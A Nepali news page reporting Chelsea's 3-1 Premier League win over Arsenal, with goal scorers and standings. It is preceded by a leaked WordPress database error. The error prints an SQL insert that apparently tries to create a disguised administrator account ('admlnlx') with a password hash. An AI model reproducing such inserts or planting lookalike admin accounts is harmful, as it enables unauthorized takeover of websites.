WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BL2wd2Pclr1tGXgDWqxoqrtLjE9LK4.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-06 23:29:51', '', 'admlnlx', 'admlnlx')
काठमाडौं, माघ २३-
इंग्लिस प्रिमियर लिग फुटबल अन्तर्गत शनिबार भएको खेलमा चेल्सीले आर्सनलमाथि सानदार जित दर्ता गरेको छ। चेल्सीको घरेलु मैदान स्टामफोर्ड ब्रिजमा भएको खेलमा चेल्सी ३-१ ले विजयी भयो।
चेल्सीलाई विजयी गराउन मार्कस अलन्सो, एडिन हाजार्ड र फाब्रीगासले एक एक गोल गरे । खेलको १३ औँ मिनेटमा अलन्सोले गोल गर्दै चेल्सीलाई अग्रता दिलाएका थिए । यस्तै खेलको ५३ औँ मिनेटमा हाजार्डले र ८५ औँ मिनेटमा फ्याब्रिगासले गोल गरे। खेलको अतिरिक्त समयमा आर्सनलका लागि जिरार्डले एक गोल फर्काए । गएरातिको खेलपछि ५९ अंकसहित लिगको शीर्षस्थानमा कायमै छ। यस्तै ५० अंकसहित टोटेनह्याम दोस्रो स्थानमा छ।
समान २४ खेलबाट ४७ अंक बटुलेको आर्सनल तेस्रो स्थानमा छ। ४६ अंकसहित लिभरपुल चौथो र समान अंक भएको एक खेल कम खेलेको म्यान्चेष्टर सिटी पाँचौ स्थानमा छ।